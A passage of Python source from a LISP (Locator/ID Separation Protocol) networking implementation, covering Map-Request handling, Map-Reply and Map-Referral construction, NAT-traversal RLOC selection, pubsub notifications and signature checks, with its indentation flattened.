lisp_process_map_notify_ack(packet, source)
elif (header.type == LISP_MAP_REFERRAL):
lisp_process_map_referral(lisp_sockets, packet, source)
elif (header.type == LISP_NAT_INFO and header.is_info_reply()):
x, y, trigger_flag = lisp_process_info_reply(source, packet, True)
elif (header.type == LISP_NAT_INFO and header.is_info_reply() == False):
addr_str = source.print_address_no_iid()
lisp_process_info_request(lisp_sockets, packet, addr_str, udp_sport,
None)
elif (header.type == LISP_ECM):
lisp_process_ecm(lisp_sockets, packet, source, udp_sport)
else:
lprint("Invalid LISP control packet type {}".format(header.type))
#endif
return(trigger_flag)
#enddef
#
# lisp_process_rloc_probe_request
#
# Process Map-Request with RLOC-probe bit set.
#
def lisp_process_rloc_probe_request(lisp_sockets, map_request, source, port,
ttl, timestamp):
p = bold("RLOC-probe", False)
if (lisp_i_am_etr):
lprint("Received {} Map-Request, send RLOC-probe Map-Reply".format(p))
lisp_etr_process_map_request(lisp_sockets, map_request, source, port,
ttl, timestamp)
return
#endif
if (lisp_i_am_rtr):
lprint("Received {} Map-Request, send RLOC-probe Map-Reply".format(p))
lisp_rtr_process_map_request(lisp_sockets, map_request, source, port,
ttl, timestamp)
return
#endif
lprint("Ignoring received {} Map-Request, not an ETR or RTR".format(p))
return
#enddef
#
# lisp_process_smr
#
def lisp_process_smr(map_request):
lprint("Received SMR-based Map-Request")
return
#enddef
#
# lisp_process_smr_invoked_request
#
def lisp_process_smr_invoked_request(map_request):
lprint("Received SMR-invoked Map-Request")
return
#enddef
#
# lisp_build_map_reply
#
# Build a Map-Reply and return a packet to the caller.
#
def lisp_build_map_reply(eid, group, rloc_set, nonce, action, ttl, map_request,
keys, enc, auth, mr_ttl=-1):
rloc_probe = map_request.rloc_probe if (map_request != None) else False
json_telemetry = map_request.json_telemetry if (map_request != None) else \
None
map_reply = lisp_map_reply()
map_reply.rloc_probe = rloc_probe
map_reply.echo_nonce_capable = enc
map_reply.hop_count = 0 if (mr_ttl == -1) else mr_ttl
map_reply.record_count = 1
map_reply.nonce = nonce
packet = map_reply.encode()
map_reply.print_map_reply()
eid_record = lisp_eid_record()
eid_record.rloc_count = len(rloc_set)
if (json_telemetry != None): eid_record.rloc_count += 1
eid_record.authoritative = auth
eid_record.record_ttl = ttl
eid_record.action = action
eid_record.eid = eid
eid_record.group = group
packet += eid_record.encode()
eid_record.print_record(" ", False)
local_rlocs = lisp_get_all_addresses() + lisp_get_all_translated_rlocs()
probing_rloc = None
for rloc_entry in rloc_set:
multicast = rloc_entry.rloc.is_multicast_address()
rloc_record = lisp_rloc_record()
probe_bit = rloc_probe and (multicast or json_telemetry == None)
addr_str = rloc_entry.rloc.print_address_no_iid()
if (addr_str in local_rlocs or multicast):
rloc_record.local_bit = True
rloc_record.probe_bit = probe_bit
rloc_record.keys = keys
if (rloc_entry.priority == 254 and lisp_i_am_rtr):
rloc_record.rloc_name = "RTR"
#endif
if (probing_rloc == None): probing_rloc = rloc_entry.rloc
#endif
rloc_record.store_rloc_entry(rloc_entry)
rloc_record.reach_bit = True
rloc_record.print_record(" ")
packet += rloc_record.encode()
#endfor
#
# Add etr-out-ts if telemetry data was present in Map-Request.
#
if (json_telemetry != None):
rloc_record = lisp_rloc_record()
if (probing_rloc): rloc_record.rloc.copy_address(probing_rloc)
rloc_record.local_bit = True
rloc_record.probe_bit = True
rloc_record.reach_bit = True
js = lisp_encode_telemetry(json_telemetry, eo=str(time.time()))
rloc_record.json = lisp_json("telemetry", js)
rloc_record.print_record(" ")
packet += rloc_record.encode()
#endif
return(packet)
#enddef
#
# lisp_build_map_referral
#
# Build a Map-Referral and return a packet to the caller.
#
def lisp_build_map_referral(eid, group, ddt_entry, action, ttl, nonce):
map_referral = lisp_map_referral()
map_referral.record_count = 1
map_referral.nonce = nonce
packet = map_referral.encode()
map_referral.print_map_referral()
eid_record = lisp_eid_record()
rloc_count = 0
if (ddt_entry == None):
eid_record.eid = eid
eid_record.group = group
else:
rloc_count = len(ddt_entry.delegation_set)
eid_record.eid = ddt_entry.eid
eid_record.group = ddt_entry.group
ddt_entry.map_referrals_sent += 1
#endif
eid_record.rloc_count = rloc_count
eid_record.authoritative = True
#
# Use action passed into this function. But if NULL, select the action
# based on the first ddt-node child type.
#
incomplete = False
if (action == LISP_DDT_ACTION_NULL):
if (rloc_count == 0):
action = LISP_DDT_ACTION_NODE_REFERRAL
else:
ddt_node = ddt_entry.delegation_set[0]
if (ddt_node.is_ddt_child()):
action = LISP_DDT_ACTION_NODE_REFERRAL
#endif
if (ddt_node.is_ms_child()):
action = LISP_DDT_ACTION_MS_REFERRAL
#endif
#endif
#endif
#
# Conditions when the incomplete bit should be set in the Map-Referral.
#
if (action == LISP_DDT_ACTION_NOT_AUTH): incomplete = True
if (action in (LISP_DDT_ACTION_MS_REFERRAL, LISP_DDT_ACTION_MS_ACK)):
incomplete = (lisp_i_am_ms and ddt_node.is_ms_peer() == False)
#endif
eid_record.action = action
eid_record.ddt_incomplete = incomplete
eid_record.record_ttl = ttl
packet += eid_record.encode()
eid_record.print_record(" ", True)
if (rloc_count == 0): return(packet)
for ddt_node in ddt_entry.delegation_set:
rloc_record = lisp_rloc_record()
rloc_record.rloc = ddt_node.delegate_address
rloc_record.priority = ddt_node.priority
rloc_record.weight = ddt_node.weight
rloc_record.mpriority = 255
rloc_record.mweight = 0
rloc_record.reach_bit = True
packet += rloc_record.encode()
rloc_record.print_record(" ")
#endfor
return(packet)
#enddef
#
# lisp_etr_process_map_request
#
# Do ETR processing of a Map-Request.
#
def lisp_etr_process_map_request(lisp_sockets, map_request, source, sport,
ttl, etr_in_ts):
if (map_request.target_group.is_null()):
db = lisp_db_for_lookups.lookup_cache(map_request.target_eid, False)
else:
db = lisp_db_for_lookups.lookup_cache(map_request.target_group, False)
if (db): db = db.lookup_source_cache(map_request.target_eid, False)
#endif
eid_str = map_request.print_prefix()
if (db == None):
lprint("Database-mapping entry not found for requested EID {}". \
format(green(eid_str, False)))
return
#endif
prefix_str = db.print_eid_tuple()
lprint("Found database-mapping EID-prefix {} for requested EID {}". \
format(green(prefix_str, False), green(eid_str, False)))
#
# Get ITR-RLOC to return Map-Reply to.
#
itr_rloc = map_request.itr_rlocs[0]
if (itr_rloc.is_private_address() and lisp_nat_traversal):
itr_rloc = source
#endif
nonce = map_request.nonce
enc = lisp_nonce_echoing
keys = map_request.keys
#
# If we found telemetry data in the Map-Request, add the input timestamp
# now and add output timestamp when building the Map-Reply.
#
jt = map_request.json_telemetry
if (jt != None):
map_request.json_telemetry = lisp_encode_telemetry(jt, ei=etr_in_ts)
#endif
db.map_replies_sent += 1
packet = lisp_build_map_reply(db.eid, db.group, db.rloc_set, nonce,
LISP_NO_ACTION, 1440, map_request, keys, enc, True, ttl)
#
# If we are sending a RLOC-probe Map-Reply to an RTR, data encapsulate it.
# If we are getting RLOC-probe Map-Requests from an xTR behind a NAT, and
# we are an ETR not behind a NAT, we want return the RLOC-probe Map-Reply
# to the swapped control ports.
#
# We could be getting a RLOC-probe from an xTR that is behind the same
# NAT as us. So do not data encapsulate the RLOC-probe reply.
#
# There is a special hack here. If the sport is 0, this RLOC-probe
# request is coming from an RTR. If we are doing gleaning on the RTR,
# this xTR needs to data encapsulate the RLOC-probe reply. The lisp_rtr_
# list will not be set because a gleaned xTR does not have NAT-traversal
# enabled.
#
if (map_request.rloc_probe and len(lisp_sockets) == 4):
public = (itr_rloc.is_private_address() == False)
rtr = itr_rloc.print_address_no_iid()
if ((public and lisp_rtr_list.has_key(rtr)) or sport == 0):
lisp_encapsulate_rloc_probe(lisp_sockets, itr_rloc, None, packet)
return
#endif
#endif
#
# Send to lisp-core process to send packet from UDP port 4342.
#
lisp_send_map_reply(lisp_sockets, packet, itr_rloc, sport)
return
#enddef
#
# lisp_rtr_process_map_request
#
# Do ETR processing of a Map-Request.
#
def lisp_rtr_process_map_request(lisp_sockets, map_request, source, sport,
ttl, etr_in_ts):
#
# Get ITR-RLOC to return Map-Reply to.
#
itr_rloc = map_request.itr_rlocs[0]
if (itr_rloc.is_private_address()): itr_rloc = source
nonce = map_request.nonce
eid = map_request.target_eid
group = map_request.target_group
rloc_set = []
for myrloc in [lisp_myrlocs[0], lisp_myrlocs[1]]:
if (myrloc == None): continue
rloc = lisp_rloc()
rloc.rloc.copy_address(myrloc)
rloc.priority = 254
rloc_set.append(rloc)
#endfor
enc = lisp_nonce_echoing
keys = map_request.keys
#
# If we found telemetry data in the Map-Request, add the input timestamp
# now and add output timestamp in building the Map-Reply.
#
jt = map_request.json_telemetry
if (jt != None):
map_request.json_telemetry = lisp_encode_telemetry(jt, ei=etr_in_ts)
#endif
packet = lisp_build_map_reply(eid, group, rloc_set, nonce, LISP_NO_ACTION,
1440, map_request, keys, enc, True, ttl)
lisp_send_map_reply(lisp_sockets, packet, itr_rloc, sport)
return
#enddef
#
# lisp_get_private_rloc_set
#
# If the source-EID and target-EID of a Map-Request are behind the same NAT,
# that is, have the same global RLOC address, then return just the private
# addresses in the Map-Reply so the xTRs have shortest RLOC paths between
# each other and don't have to hair-pin through the NAT/firewall device.
#
def lisp_get_private_rloc_set(target_site_eid, seid, group):
rloc_set = target_site_eid.registered_rlocs
source_site_eid = lisp_site_eid_lookup(seid, group, False)
if (source_site_eid == None): return(rloc_set)
#
# Get global RLOC address from target site.
#
target_rloc = None
new_set = []
for rloc_entry in rloc_set:
if (rloc_entry.is_rtr()): continue
if (rloc_entry.rloc.is_private_address()):
new_rloc = copy.deepcopy(rloc_entry)
new_set.append(new_rloc)
continue
#endif
target_rloc = rloc_entry
break
#endfor
if (target_rloc == None): return(rloc_set)
target_rloc = target_rloc.rloc.print_address_no_iid()
#
# Get global RLOC address from source site.
#
source_rloc = None
for rloc_entry in source_site_eid.registered_rlocs:
if (rloc_entry.is_rtr()): continue
if (rloc_entry.rloc.is_private_address()): continue
source_rloc = rloc_entry
break
#endfor
if (source_rloc == None): return(rloc_set)
source_rloc = source_rloc.rloc.print_address_no_iid()
#
# If the xTRs are behind the same NAT, then we return private addresses.
#
site_id = target_site_eid.site_id
if (site_id == 0):
if (source_rloc == target_rloc):
lprint("Return private RLOCs for sites behind {}".format( \
target_rloc))
return(new_set)
#endif
return(rloc_set)
#endif
#
# If the xTRs are not behind the same NAT, but are configured in the
# same site-id, they can reach each other with private addresses. So
# return them in the RLOC-set.
#
if (site_id == source_site_eid.site_id):
lprint("Return private RLOCs for sites in site-id {}".format(site_id))
return(new_set)
#endif
return(rloc_set)
#enddef
#
# lisp_get_partial_rloc_set
#
# If the Map-Request source is found in the RLOC-set, return all RLOCs that
# do not have the same priority as the Map-Request source (an RTR supporting
# NAT-traversal) RLOC. Otherwise, return all RLOCs that are not priority 254.
#
def lisp_get_partial_rloc_set(registered_rloc_set, mr_source, multicast):
rtr_list = []
rloc_set = []
#
# Search the RTR list to see if the Map-Requestor is an RTR. If so,
# return the RLOC-set to the RTR so it can replicate directly to ETRs.
# Otherwise, return the RTR-list locator-set to the requesting ITR/PITR.
#
rtr_is_requestor = False
behind_nat = False
for rloc_entry in registered_rloc_set:
if (rloc_entry.priority != 254): continue
behind_nat |= True
if (rloc_entry.rloc.is_exact_match(mr_source) == False): continue
rtr_is_requestor = True
break
#endfor
#
# If we find an RTR in the RLOC-set, then the site's RLOC-set is behind
# a NAT. Otherwise, do not return a partial RLOC-set. This RLOC-set is in
# public space.
#
if (behind_nat == False): return(registered_rloc_set)
#
# An RTR can be behind a NAT when deployed in a cloud infrastructure.
# When the MS is in the same cloud infrastructure, the source address
# of the Map-Request (ECM) is not translated. So we are forced to put
# the private address in the rtr-list the MS advertises. But we should
# not return the private address in any Map-Replies. We use the private
# address in the rtr-list for the sole purpose to identify the RTR so
# we can return the RLOC-set of the ETRs.
#
ignore_private = (os.getenv("LISP_RTR_BEHIND_NAT") != None)
#
# Create two small lists. A list of RTRs which are unicast priority of
# 254 and a rloc-set which are records that are not priority 254.
#
for rloc_entry in registered_rloc_set:
if (ignore_private and rloc_entry.rloc.is_private_address()): continue
if (multicast == False and rloc_entry.priority == 255): continue
if (multicast and rloc_entry.mpriority == 255): continue
if (rloc_entry.priority == 254):
rtr_list.append(rloc_entry)
else:
rloc_set.append(rloc_entry)
#endif
#endif
#
# The RTR is sending the Map-Request.
#
if (rtr_is_requestor): return(rloc_set)
#
# An ITR is sending the Map-Request.
#
# Chcek the case where an ETR included a local RLOC and may be behind
# the same NAT as the requester. In this case, the requester can encap
# directly the private RLOC. If it is not reachable, the ITR can encap
# to the RTR. The ITR will cache a subset of the RLOC-set in this entry
# (so it can check the global RLOC first and not encap to itself).
#
rloc_set = []
for rloc_entry in registered_rloc_set:
if (rloc_entry.rloc.is_private_address()): rloc_set.append(rloc_entry)
#endfor
rloc_set += rtr_list
return(rloc_set)
#enddef
#
# lisp_store_pubsub_state
#
# Take information from Map-Request to create a pubsub cache. We remember
# the map-server lookup EID-prefix. So when the RLOC-set changes for this
# EID-prefix, we trigger a Map-Notify messate to the ITR's RLOC and port
# number.
#
def lisp_store_pubsub_state(reply_eid, itr_rloc, mr_sport, nonce, ttl, xtr_id):
pubsub = lisp_pubsub(itr_rloc, mr_sport, nonce, ttl, xtr_id)
pubsub.add(reply_eid)
return
#enddef
#
# lisp_convert_reply_to_notify
#
# In lisp_ms_process_map_request(), a proxy map-reply is built to return to
# a requesting ITR. If the requesting ITR set the N-bit in the Map-Request,
# a subscription request is being requested, return a Map-Notify so it knows
# it has been acked.
#
# This function takes a fully built Map-Reply, changes the first 4 bytes to
# make the message a Map-Notify and inserts 4-bytes of Key-ID, Alg-ID, and
# Authentication Length of 0. Then we have converted the Map-Reply into a
# Map-Notify.
#
def lisp_convert_reply_to_notify(packet):
#
# Get data we need from Map-Reply for Map-Notify.
#
record_count = struct.unpack("I", packet[0:4])[0]
record_count = socket.ntohl(record_count) & 0xff
nonce = packet[4:12]
packet = packet[12::]
#
# Build Map-Notify header.
#
first_long = (LISP_MAP_NOTIFY << 28) | record_count
header = struct.pack("I", socket.htonl(first_long))
auth = struct.pack("I", 0)
#
# Concat fields of Map-Notify.
#
packet = header + nonce + auth + packet
return(packet)
#enddef
#
# lisp_notify_subscribers
#
# There has been an RLOC-set change, inform all subscribers who have subscribed
# to this EID-prefix.
#
def lisp_notify_subscribers(lisp_sockets, eid_record, eid, site):
eid_str = eid.print_prefix()
if (lisp_pubsub_cache.has_key(eid_str) == False): return
for pubsub in lisp_pubsub_cache[eid_str].values():
itr = pubsub.itr
port = pubsub.port
itr_str = red(itr.print_address_no_iid(), False)
sub_str = bold("subscriber", False)
xtr_id = "0x" + lisp_hex_string(pubsub.xtr_id)
nonce = "0x" + lisp_hex_string(pubsub.nonce)
lprint(" Notify {} {}:{} xtr-id {} for {}, nonce {}".format( \
sub_str, itr_str, port, xtr_id, green(eid_str, False), nonce))
lisp_build_map_notify(lisp_sockets, eid_record, [eid_str], 1, itr,
port, pubsub.nonce, 0, 0, 0, site, False)
pubsub.map_notify_count += 1
#endfor
return
#enddef
#
# lisp_process_pubsub
#
# Take a fully built Map-Reply and send a Map-Notify as a pubsub ack.
#
def lisp_process_pubsub(lisp_sockets, packet, reply_eid, itr_rloc, port, nonce,
ttl, xtr_id):
#
# Store subscriber state.
#
lisp_store_pubsub_state(reply_eid, itr_rloc, port, nonce, ttl, xtr_id)
eid = green(reply_eid.print_prefix(), False)
itr = red(itr_rloc.print_address_no_iid(), False)
mn = bold("Map-Notify", False)
xtr_id = "0x" + lisp_hex_string(xtr_id)
lprint("{} pubsub request for {} to ack ITR {} xtr-id: {}".format(mn,
eid, itr, xtr_id))
#
# Convert Map-Reply to Map-Notify header and send out.
#
packet = lisp_convert_reply_to_notify(packet)
lisp_send_map_notify(lisp_sockets, packet, itr_rloc, port)
return
#enddef
#
# lisp_ms_process_map_request
#
# Do Map-Server processing of a Map-Request. Returns various LISP-DDT internal
# and external action values.
#
def lisp_ms_process_map_request(lisp_sockets, packet, map_request, mr_source,
mr_sport, ecm_source):
#
# Look up EID in site cache. If we find it and it has registered for
# proxy-replying, this map-server will send the Map-Reply. Otherwise,
# send to one of the ETRs at the registered site.
#
eid = map_request.target_eid
group = map_request.target_group
eid_str = lisp_print_eid_tuple(eid, group)
itr_rloc = map_request.itr_rlocs[0]
xtr_id = map_request.xtr_id
nonce = map_request.nonce
action = LISP_NO_ACTION
pubsub = map_request.subscribe_bit
#
# Check if we are verifying Map-Request signatures. If so, do a mapping
# database lookup on the source-EID to get public-key.
#
sig_good = True
is_crypto_hash = (lisp_get_eid_hash(eid) != None)
if (is_crypto_hash):
sig = map_request.map_request_signature
if (sig == None):
sig_good = False
lprint(("EID-crypto-hash signature verification {}, " + \
"no signature found").format(bold("failed", False)))
else:
sig_eid = map_request.signature_eid
hash_eid, pubkey, sig_good = lisp_lookup_public_key(sig_eid)
if (sig_good):
sig_good = map_request.verify_map_request_sig(pubkey)
else:
lprint("Public-key lookup failed for sig-eid {}, hash-eid {}".\
format(sig_eid.print_address(), hash_eid.print_address()))
#endif
pf = bold("passed", False) if sig_good else bold("failed", False)
lprint("EID-crypto-hash signature verification {}".format(pf))
#endif
#endif
if (pubsub and sig_good == False):
pubsub = False
lprint("Suppress creating pubsub state due to signature failure")
#endif
#
# There are two cases here that need attention. If the Map-Request was
# an IPv6 Map-Request but the ECM came to us in a IPv4 packet, we need
# to return the Map-Reply in IPv4. And if the Map-Request came to us
# through a NAT, sending the Map-Reply to the Map-Request port won't
# get translated by the NAT. So we have to return the Map-Reply to the
# ECM port. Hopefully, the RTR is listening on the ECM port and using
# the Map-Request port as the ECM port as well. This is typically only
# a problem on the RTR, when behind a NAT. For an ITR, it usaully
# doesn't send Map-Requests since NAT-traversal logic installs default
# map-cache entries.
#
reply_dest = itr_rloc if (itr_rloc.afi == ecm_source.afi) else ecm_source
site_eid = lisp_site_eid_lookup(eid, group, False)
if (site_eid == None or site_eid.is_star_g()):
notfound = bold("Site not found", False)
lprint("{} for requested EID {}".format(notfound,
green(eid_str, False)))
#
# Send negative Map-Reply with TTL 15 minutes.
#
lisp_send_negative_map_reply(lisp_sockets, eid, group, nonce, itr_rloc,
mr_sport, 15, xtr_id, pubsub)
return([eid, group, LISP_DDT_ACTION_SITE_NOT_FOUND])
#endif
prefix_str = site_eid.print_eid_tuple()
site_name = site_eid.site.site_name
#
# If we are requesting for non Crypto-EIDs and signatures are configured
# to be requred and no signature is in the Map-Request, bail.
#
if (is_crypto_hash == False and site_eid.require_signature):
sig = map_request.map_request_signature
sig_eid = map_request.signature_eid
if (sig == None or sig_eid.is_null()):
lprint("Signature required for site {}".format(site_name))
sig_good = False
else:
sig_eid = map_request.signature_eid
hash_eid, pubkey, sig_good = lisp_lookup_public_key(sig_eid)
if (sig_good):
sig_good = map_request.verify_map_request_sig(pubkey)
else:
lprint("Public-key lookup failed for sig-eid {}, hash-eid {}".\
format(sig_eid.print_address(), hash_eid.print_address()))
#endif
pf = bold("passed", False) if sig_good else bold("failed", False)
lprint("Required signature verification {}".format(pf))
#endif
#endif
#
# Check if site-eid is registered.
#
if (sig_good and site_eid.registered == False):
lprint("Site '{}' with EID-prefix {} is not registered for EID {}". \
format(site_name, green(prefix_str, False), green(eid_str, False)))
#
# We do not to return a coarser EID-prefix to the Map-Resolver. The
# AMS site entry may be one.
#
if (site_eid.accept_more_specifics == False):
eid = site_eid.eid
group = site_eid.group
#endif
#
# Send forced-TTLs even for native-forward entries.
#
ttl = 1
if (site_eid.force_ttl != None):
ttl = site_eid.force_ttl | 0x80000000
#endif
#
# Send negative Map-Reply with TTL 1 minute.
#
lisp_send_negative_map_reply(lisp_sockets, eid, group, nonce, itr_rloc,
mr_sport, ttl, xtr_id, pubsub)
return([eid, group, LISP_DDT_ACTION_MS_NOT_REG])
#endif
#
# Should we proxy-reply?
#
nat = False
pr_str = ""
check_policy = False
if (site_eid.force_nat_proxy_reply):
pr_str = ", nat-forced"
nat = True
check_policy = True
elif (site_eid.force_proxy_reply):
pr_str = ", forced"
check_policy = True
elif (site_eid.proxy_reply_requested):
pr_str = ", requested"
check_policy = True
elif (map_request.pitr_bit and site_eid.pitr_proxy_reply_drop):
pr_str = ", drop-to-pitr"
action = LISP_DROP_ACTION
elif (site_eid.proxy_reply_action != ""):
action = site_eid.proxy_reply_action
pr_str = ", forced, action {}".format(action)
action = LISP_DROP_ACTION if (action == "drop") else \
LISP_NATIVE_FORWARD_ACTION
#endif
#
# Apply policy to determine if we send a negative map-reply with action
# "policy-denied" or we send a map-reply with the policy set parameters.
#
policy_drop = False
policy = None
if (check_policy and lisp_policies.has_key(site_eid.policy)):
p = lisp_policies[site_eid.policy]
if (p.match_policy_map_request(map_request, mr_source)): policy = p
if (policy):
ps = bold("matched", False)
lprint("Map-Request {} policy '{}', set-action '{}'".format(ps,
p.policy_name, p.set_action))
else:
ps = bold("no match", False)
lprint("Map-Request {} for policy '{}', implied drop".format(ps,
p.policy_name))
policy_drop = True
#endif
#endif
if (pr_str != ""):
lprint("Proxy-replying for EID {}, found site '{}' EID-prefix {}{}". \
format(green(eid_str, False), site_name, green(prefix_str, False),
pr_str))
rloc_set = site_eid.registered_rlocs
ttl = 1440
if (nat):
if (site_eid.site_id != 0):
seid = map_request.source_eid
rloc_set = lisp_get_private_rloc_set(site_eid, seid, group)
#endif
if (rloc_set == site_eid.registered_rlocs):
m = (site_eid.group.is_null() == False)
new_set = lisp_get_partial_rloc_set(rloc_set, reply_dest, m)
if (new_set != rloc_set):
ttl = 15
rloc_set = new_set
#endif
#endif
#endif
#
# Force TTL if configured. To denote seconds in TTL field of EID-record
# set high-order bit in ttl value.
#
if (site_eid.force_ttl != None):
ttl = site_eid.force_ttl | 0x80000000
#endif
#
# Does policy say what the ttl should be? And if we should drop the
# Map-Request and return a negative Map-Reply
#
if (policy):
if (policy.set_record_ttl):
ttl = policy.set_record_ttl
lprint("Policy set-record-ttl to {}".format(ttl))
#endif
if (policy.set_action == "drop"):
lprint("Policy set-action drop, send negative Map-Reply")
action = LISP_POLICY_DENIED_ACTION
rloc_set = []
else:
rloc = policy.set_policy_map_reply()
if (rloc): rloc_set = [rloc]
#endif
#endif
if (policy_drop):
lprint("Implied drop action, send negative Map-Reply")
action = LISP_POLICY_DENIED_ACTION
rloc_set = []
#endif
enc = site_eid.echo_nonce_capable
#
# Don't tell spoofer any prefix information about the target EID.
#
if (sig_good):
reply_eid = site_eid.eid
reply_group = site_eid.group
else:
reply_eid = eid
reply_group = group
action = LISP_AUTH_FAILURE_ACTION
rloc_set = []
#endif
#
# If this Map-Request is also a subscription request, return same
# information in a Map-Notify.
#
packet = lisp_build_map_reply(reply_eid, reply_group, rloc_set,
nonce, action, ttl, map_request, None, enc, False)
if (pubsub):
lisp_process_pubsub(lisp_sockets, packet, reply_eid, itr_rloc,
mr_sport, nonce, ttl, xtr_id)
else:
lisp_send_map_reply(lisp_sockets, packet, itr_rloc, mr_sport)
#endif
return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
#endif
#
# If there are no registered RLOCs, return.
#
rloc_count = len(site_eid.registered_rlocs)
if (rloc_count == 0):
lprint("Requested EID {} found site '{}' with EID-prefix {} with " + \
"no registered RLOCs".format(green(eid_str, False), site_name,
green(prefix_str, False)))
return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
#endif
#
# Forward to ETR at registered site. We have to put in an ECM.
#
hash_address = map_request.target_eid if map_request.source_eid.is_null() \
else map_request.source_eid
hashval = map_request.target_eid.hash_address(hash_address)
hashval %= rloc_count
etr = site_eid.registered_rlocs[hashval]
if (etr.rloc.is_null()):
lprint(("Suppress forwarding Map-Request for EID {} at site '{}' " + \
"EID-prefix {}, no RLOC address").format(green(eid_str, False),
site_name, green(prefix_str, False)))
else:
lprint(("Forwarding Map-Request for EID {} to ETR {} at site '{}' " + \
"EID-prefix {}").format(green(eid_str, False),
red(etr.rloc.print_address(), False), site_name,
green(prefix_str, False)))
#
# Send ECM.
#
lisp_send_ecm(lisp_sockets, packet, map_request.source_eid, mr_sport,
map_request.target_eid, etr.rloc, to_etr=True)
#endif
return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
#enddef
#
# lisp_ddt_process_map_request
#
# Do DDT-node processing of a Map-Request received from an Map-Resolver.
#
def lisp_ddt_process_map_request(lisp_sockets, map_request, ecm_source, port):
#
# Lookup target EID address in DDT cache.
#
eid = map_request.target_eid
group = map_request.target_group
eid_str = lisp_print_eid_tuple(eid, group)
nonce = map_request.nonce
action = LISP_DDT_ACTION_NULL
#
# First check to see if EID is registered locally if we are a Map-Server.
# Otherwise, do DDT lookup.
#
ddt_entry = None
if (lisp_i_am_ms):
site_eid = lisp_site_eid_lookup(eid, group, False)
if (site_eid == None): return
if (site_eid.registered):
action = LISP_DDT_ACTION_MS_ACK
ttl = 1440
else:
eid, group, action = lisp_ms_compute_neg_prefix(eid, group)
action = LISP_DDT_ACTION_MS_NOT_REG
ttl = 1
#endif
else:
ddt_entry = lisp_ddt_cache_lookup(eid, group, False)
if (ddt_entry == None):
action = LISP_DDT_ACTION_NOT_AUTH
ttl = 0
lprint("DDT delegation entry not found for EID {}".format( \
green(eid_str, False)))
elif (ddt_entry.is_auth_prefix()):
#
# Check auth-prefix. That means there are no referrals.
#
action = LISP_DDT_ACTION_DELEGATION_HOLE
ttl = 15
ddt_entry_str = ddt_entry.print_eid_tuple()
lprint(("DDT delegation entry not found but auth-prefix {} " + \
"found for EID {}").format(ddt_entry_str,
green(eid_str, False)))
if (group.is_null()):
eid = lisp_ddt_compute_neg_prefix(eid, ddt_entry,
lisp_ddt_cache)
else:
group = lisp_ddt_compute_neg_prefix(group, ddt_entry,
lisp_ddt_cache)
eid = lisp_ddt_compute_neg_prefix(eid, ddt_entry,
ddt_entry.source_cache)
#endif
ddt_entry = None
else:
ddt_entry_str = ddt_entry.print_eid_tuple()
lprint("DDT delegation entry {} found for EID {}".format( \
ddt_entry_str, green(eid_str, False)))
ttl = 1440
#endif
#endif
#
# Build and return a Map-Referral message to the source of the Map-Request.
#
packet = lisp_build_map_referral(eid, group, ddt_entry, action, ttl, nonce)
nonce = map_request.nonce >> 32
if (map_request.nonce != 0 and nonce != 0xdfdf0e1d): port = LISP_CTRL_PORT
lisp_send_map_referral(lisp_sockets, packet, ecm_source, port)
return
#enddef
#
# lisp_find_negative_mask_len
#
# XOR the two addresses so we can find the first bit that is different. Then
# count the number of bits from the left that bit position is. That is the
# new mask-length. Compare to the neg-prefix mask-length we have found so
# far. If the new one is longer than the stored one so far, replace it.
#
# This function assumes the address size and the address-family are the same
# for 'eid' and 'entry_prefix'. Caller must make sure of that.
#
def lisp_find_negative_mask_len(eid, entry_prefix, neg_prefix):
diff_address = eid.hash_address(entry_prefix)
address_size = eid.addr_length() * 8
mask_len = 0
#
# The first set bit is the one that is different.
#
for mask_len in range(address_size):
bit_test = 1 << (address_size - mask_len - 1)
if (diff_address & bit_test): break
#endfor
if (mask_len > neg_prefix.mask_len): neg_prefix.mask_len = mask_len
return
#enddef
#
# lisp_neg_prefix_walk
#
# Callback routine to decide which prefixes should be considered by function
# lisp_find_negative_mask_len().
#
# 'entry' in this routine could be a lisp_ddt_entry() or a lisp_site_eid().
#
def lisp_neg_prefix_walk(entry, parms):
eid, auth_prefix, neg_prefix = parms
if (auth_prefix == None):
if (entry.eid.instance_id != eid.instance_id):
return([True, parms])
#endif
if (entry.eid.afi != eid.afi): return([True, parms])
else:
if (entry.eid.is_more_specific(auth_prefix) == False):
return([True, parms])
#endif
#endif
#
# Find bits that match.
#
lisp_find_negative_mask_len(eid, entry.eid, neg_prefix)
return([True, parms])
#enddef
#
# lisp_ddt_compute_neg_prefix
#
# Walk the DDT cache to compute the least specific prefix within the auth-
# prefix found.
#
def lisp_ddt_compute_neg_prefix(eid, ddt_entry, cache):
#
# Do not compute negative prefixes for distinguished-names or geo-prefixes.
#
if (eid.is_binary() == False): return(eid)
neg_prefix = lisp_address(eid.afi, "", 0, 0)
neg_prefix.copy_address(eid)
neg_prefix.mask_len = 0
auth_prefix_str = ddt_entry.print_eid_tuple()
auth_prefix = ddt_entry.eid
#
# Walk looking for the shortest prefix that DOES not match any site EIDs
# configured.
#
eid, auth_prefix, neg_prefix = cache.walk_cache(lisp_neg_prefix_walk,
(eid, auth_prefix, neg_prefix))
#
# Store high-order bits that are covered by the mask-length.
#
neg_prefix.mask_address(neg_prefix.mask_len)
lprint(("Least specific prefix computed from ddt-cache for EID {} " + \
"using auth-prefix {} is {}").format(green(eid.print_address(), False),
auth_prefix_str, neg_prefix.print_prefix()))
return(neg_prefix)
#enddef
#
# lisp_ms_compute_neg_prefix
#
# From the site cache and the DDT cache, compute a negative EID-prefix to not
# be shorter than a configured authoritative-prefix.
#
def lisp_ms_compute_neg_prefix(eid, group):
neg_prefix = lisp_address(eid.afi, "", 0, 0)
neg_prefix.copy_address(eid)
neg_prefix.mask_len = 0
gneg_prefix = lisp_address(group.afi, "", 0, 0)
gneg_prefix.copy_address(group)
gneg_prefix.mask_len = 0
auth_prefix = None
#
# Look for auth-prefix in DDT cache. If not found, we return the host
# based EID in a negative Map-Referral, action non-authoritative.
#
if (group.is_null()):
ddt_entry = lisp_ddt_cache.lookup_cache(eid, False)
if (ddt_entry == None):
neg_prefix.mask_len = neg_prefix.host_mask_len()
gneg_prefix.mask_len = gneg_prefix.host_mask_len()
return([neg_prefix, gneg_prefix, LISP_DDT_ACTION_NOT_AUTH])
#endif
cache = lisp_sites_by_eid
if (ddt_entry.is_auth_prefix()): auth_prefix = ddt_entry.eid
else:
ddt_entry = lisp_ddt_cache.lookup_cache(group, False)
if (ddt_entry == None):
neg_prefix.mask_len = neg_prefix.host_mask_len()
